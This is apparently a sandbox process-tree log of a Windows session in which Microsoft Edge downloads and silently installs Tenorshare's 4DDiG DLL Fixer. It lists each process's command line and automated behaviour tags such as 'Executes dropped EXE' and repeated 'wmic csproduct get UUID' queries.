C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:22⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:32⤵PID:1896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:82⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:12⤵PID:2336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:12⤵PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:12⤵PID:5684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:12⤵PID:4600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:82⤵PID:688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4968 /prefetch:82⤵PID:5496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5208 /prefetch:82⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:82⤵PID:5744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:12⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:12⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:12⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6340 /prefetch:82⤵PID:5212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 /prefetch:82⤵
- NTFS ADS
PID:5640
-
-
C:\Users\Admin\Downloads\4ddig-dll-fixer.exe"C:\Users\Admin\Downloads\4ddig-dll-fixer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\4ddigdllfixer_4ddignet\4ddigdllfixer_4ddignet_1.0.3.exe/VERYSILENT /SP- /NORESTART /DIR="C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\" /LANG=en /LOG="C:\Users\Admin\AppData\Local\Temp\4DDiG DLL Fixer_Setup_20240718235127.log" /sptrack null3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3364 -
C:\Users\Admin\AppData\Local\Temp\is-VOCO2.tmp\4ddigdllfixer_4ddignet_1.0.3.tmp"C:\Users\Admin\AppData\Local\Temp\is-VOCO2.tmp\4ddigdllfixer_4ddignet_1.0.3.tmp" /SL5="$4091A,15709381,254464,C:\Users\Admin\AppData\Local\Temp\4ddigdllfixer_4ddignet\4ddigdllfixer_4ddignet_1.0.3.exe" /VERYSILENT /SP- /NORESTART /DIR="C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\" /LANG=en /LOG="C:\Users\Admin\AppData\Local\Temp\4DDiG DLL Fixer_Setup_20240718235127.log" /sptrack null4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:1168
-
-
-
C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\NetFrameCheck.exe"C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\NetFrameCheck.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2144 -
C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\4DDiG DLL Fixer.exe"C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\4DDiG DLL Fixer.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
PID:3560 -
C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\Monitor.exe"C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\Monitor.exe" 3560(#-+)G-R3J5BGKYPG(#-+)4DDiG DLL Fixer(#-+)1.0.3(#-+)&cd1=1.0.3.7&cd2=0(#-+)15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4348
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cbs.tenorshare.com/go?pid=8122&a=i&v=1.0.35⤵PID:2560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc80593cb8,0x7ffc80593cc8,0x7ffc80593cd86⤵PID:4908
-
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:5824
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:4412
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:3192
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:4176
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:2796
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:5552
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:5324
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:6080
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:6616
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID5⤵PID:6776
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:12⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:12⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:12⤵PID:1380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:12⤵PID:6016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1248 /prefetch:22⤵PID:8004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:7512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:12⤵PID:7496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:12⤵PID:7960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1700 /prefetch:12⤵PID:7948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:12⤵PID:7956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7376 /prefetch:12⤵PID:7976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:12⤵PID:7984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:12⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:12⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:12⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:12⤵PID:2128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:12⤵PID:6864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:12⤵PID:6344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:12⤵PID:2060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:12⤵PID:5792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:12⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:12⤵PID:7412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8240 /prefetch:82⤵PID:7772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9104 /prefetch:12⤵PID:6044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1736 /prefetch:12⤵PID:6000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8796 /prefetch:12⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8532 /prefetch:12⤵PID:7020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:12⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:12⤵PID:2296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9032 /prefetch:12⤵PID:7280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:12⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:7784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:12⤵PID:5292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,380620747075591303,7233883412449479156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:12⤵PID:6908
-
-
